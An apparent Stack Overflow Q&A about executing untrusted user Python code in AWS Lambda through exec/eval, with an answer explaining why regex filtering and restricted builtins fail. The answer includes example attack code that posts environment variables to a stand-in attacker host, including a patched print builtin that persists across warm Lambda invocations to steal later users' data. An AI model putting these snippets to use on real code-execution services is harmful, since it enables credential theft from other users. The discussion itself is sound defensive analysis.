Running Untrusted Python Code in AWS-LAMBDA using Exec or Eval


Question


    Been doing a ton of research. I am a mere padawan, however, I have a project where I must run a user's untrusted Python3 code from a website.

    I also apologize in advance if this question has some moving parts.

    • I am looking for an as safe as possible approach. This doesn't need to be 100% perfect unless there is a big risk of leaking extremely sensitive data.

    Main questions:

    • Does my AWS-lambda plan run an extreme risk for leaking sensitive data?
    • Are there any other simple precautions that I should take which could make this work safer in AWS-lambda?
    • Are there ways for exec() to break out of the AWS-lambda container and make any other network connections if all I have connected to it is the single AWS-api-gateway for the REST call?
    • Do I even need to limit __builtins__ and locals, or are AWS-lambda containers safe enough?

    Background

    It seems most companies use Kubernetes and Docker containers to execute untrusted python code (such as Leetcode, Programiz, or hackerRank).

    See these helpful links:

    My Plan

    I am thinking that I can POST my arbitrary Python code to an AWS Lambda Function as a microservice, using their containerization/scaling rather than building my own. In the Lambda container, I can just run the code through a simple exec or eval function, perhaps with some limitations like this:

    "

    safe_list = ['math','acos', 'asin', 'atan', 'print','atan2', 'ceil', 'cos', 'cosh', 'de grees', 'e', 'exp', 'fabs', 'floor', 'fmod', 'frexp', 'hypot', 'ldexp', 'log', 'log10', 'modf', 'pi', 'pow', 'radians', 'sin', 'sinh', 'sqrt', 'tan', 'tanh'] 
        safe_dict = dict([ (k, locals().get(k, None)) for k in safe_list ]) 
        safe_dict['abs'] = abs
        exec(userCode,{"**__builtins__"**:None},safe_dict )
    

    Special Note:

    • I am not too concerned about infinite loops or crashing things, because I will just timeout and tell the user to try again.
    • All I need to do is run pretty simple python code (generally less than a few lines) and return exceptions, stdout, prints, and run a check on the result. Need to run:
      • Math operators, lists, loops, lambda functions, maps, filters, declaring methods, declaring classes with properties, print (a hypothetical example follows this list).
    • This doesn't need to be a perfect project for hundreds of thousands of users. I just want to have a live site for a resume booster and maybe make a little money on ads to help with costs.
    • If there are severe limitations, I can eventually implement it in Kubernetes (as in the above link), but hopefully, this solution will work well enough.
    • I just want this to work relatively well and not take too long to build or cost too much money.
    • I do not want to leak any sensitive information.
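
    As a rough illustration (the snippet itself is hypothetical, not taken from the question), the kind of user code that needs to run looks something like this:

        class Rectangle:
            def __init__(self, w, h):
                self.w = w
                self.h = h

            def area(self):
                return self.w * self.h

        sizes = [(1, 3), (2, 4), (3, 5)]
        areas = list(map(lambda wh: Rectangle(*wh).area(), sizes))
        odd_areas = list(filter(lambda a: a % 2 == 1, areas))
        print(sum(odd_areas), odd_areas)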

    Security things I am already planning on doing:

    • AWS lambda: Limit the timeout to around 1-2 seconds (this and the memory limit are shown in the boto3 sketch after this list)
    • AWS lambda: Limit the memory usage to 128 MB
    • My Own Code: Use regex to make sure no one is passing in double underscores badstuff
    • Keeping this microservice as minimal as possible (only connecting a single AWS-API-gateway).
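
    For reference, the first two limits could be applied with a minimal boto3 sketch like this (the function name is a placeholder; the same values can just as well be set in the console or a SAM/Serverless template):

        import boto3

        # Cap runtime and memory on the (hypothetical) code-runner function.
        lambda_client = boto3.client("lambda")
        lambda_client.update_function_configuration(
            FunctionName="run-untrusted-python",  # placeholder name
            Timeout=2,       # seconds
            MemorySize=128,  # MB
        )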

    Other notes:

    • I don't think I can use restrictedPython or PyPy's sandbox feature in AWS Lambda because I don't have access to those dependencies OOB. I'm hoping that those are not necessary for this use case.
    • If it's impossible to do this with exec(), are there safe python interpreters on GitHub or someplace that I can literally copy-paste into files in AWS-lambda and just call them?
    • I am planning on allowing the user to print from exec with something like this:

    "

    @contextlib.contextmanager
    def stdoutIO(stdout=None):
        old = sys.stdout
        if stdout is None:
            stdout = StringIO()
        sys.stdout = stdout
        yield stdout
        sys.stdout = old
    
        
    with stdoutIO() as s:
        try:
            exec(userCode)
        except:
            print("Something wrong with the code")
    print( s.getvalue())
    print(i)
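
    Putting these pieces together, a rough sketch of how the handler behind the API gateway might be wired up (the request/response shapes are assumptions, and it reuses the safe_dict and stdoutIO() helpers from the snippets above; this is not a finished design):

        import json

        def lambda_handler(event, context):
            # API Gateway proxy integration: the user's code arrives in the JSON request body.
            user_code = json.loads(event.get("body") or "{}").get("code", "")

            result = {"stdout": "", "error": None}
            with stdoutIO() as s:
                try:
                    # Copy safe_dict so one invocation cannot mutate it for the next warm start.
                    exec(user_code, {"__builtins__": None}, dict(safe_dict))
                except Exception as exc:
                    result["error"] = f"{type(exc).__name__}: {exc}"
            result["stdout"] = s.getvalue()

            return {"statusCode": 200, "body": json.dumps(result)}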
    

    Please let me know if you have any questions or suggestions.

    Edit: adding architecture diagram

    Solution

    I'm looking into this too, and I'm interested in whether AWS lambda can be used to run untrusted code. Mostly your logic looks reasonable, but a couple of things stick out.

    Use regex to make sure no one is passing in double underscores badstuff

    Don't do this! It's impossible (or virtually impossible) to check if a string containing python code is malicious or not. Think of someone asking you to call this:

    eval(base64.b64decode(b'cHJpbnQoInRoaXMgaXNuJ3QgYmFkLCBidXQgeW91IGRvbid0IGtub3cgdGhhdCEiKQ=='))
    

    Is that safe? Is it going to be picked up by a regex? Fine, you could mock eval(), but what next? I've absolutely no doubt that a half-competent Python developer could find a route round it.
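
    To make that concrete, a hypothetical payload like the one below contains no double underscores at all, so a dunder-matching regex never fires, yet with ordinary builtins available it reads and posts every environment variable the function can see (the URL is made up):

        # No double underscores anywhere, but it still exfiltrates os.environ.
        import json, os, urllib.request
        payload = json.dumps(dict(os.environ)).encode()
        urllib.request.urlopen("https://attacker.example/collect", data=payload)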

    Half secure is worse than not secure at all

    You'll start to trust it, build another feature that relies on the semi-secure layer and end up getting hacked.


    Solutions

    1. Use a language or feature that lots of people and big companies rely on; that way the risk of a breach is small (and if someone does find a zero-day vulnerability, there will be someone more profitable to hack than you). Javascript might be a good option here if you can use it; you might also try pypy or RustPython compiled to WebAssembly.
    2. Accept that your code is not at all secure, and rely on the OS/PAAS to protect you. In other words, let the user run whatever they like in the AWS lambda, and let Amazon isolate it.

    My Problem

    I want to use the second option, but I'm worried about a hostile developer's capacity to taint a lambda container, which is then used by another innocent developer who falls victim.

    Let's say we have an AWS lambda that effectively calls eval(user_written_code) and returns the result; it might also set a bunch of environment variables which can be referenced in user_written_code.

    The lambda prevents them doing anything malicious when the code is called - e.g. the lambda user credentials don't have access to anything scary. They can make requests, use up memory, eat CPU, hang - all that's taken care of by AWS.

    But how do I stop the following vector:

    1. A malicious user executes code which mocks a builtin method; when that method is later called, the current code context and environment variables are posted to some server (see the sketch after this list).
    2. An innocent user executes their code on the same lambda container; AWS lambda cleverly reuses the process to improve performance.
    3. The innocent user's code and credentials (environment variables) get posted to the malicious user's server.
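
    A hypothetical sketch of step 1, just to show how little is needed (the endpoint is made up; module-level state like this survives because Lambda keeps the Python process alive between warm invocations):

        import builtins, json, os, urllib.request

        _real_print = builtins.print

        def _leaky_print(*args, **kwargs):
            # Exfiltrate the environment plus whatever was printed, then behave normally.
            try:
                data = json.dumps({"env": dict(os.environ), "args": [str(a) for a in args]}).encode()
                urllib.request.urlopen("https://attacker.example/collect", data=data, timeout=1)
            except Exception:
                pass  # fail silently so the victim notices nothing
            return _real_print(*args, **kwargs)

        # The patched builtin persists in this process; a later invocation that runs an
        # innocent user's code through plain exec() will call it unknowingly.
        builtins.print = _leaky_print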

    I'd be interested to know if anyone has confirmed, one way or the other, whether there's an effective way to prevent lambda containers from getting tainted like this.
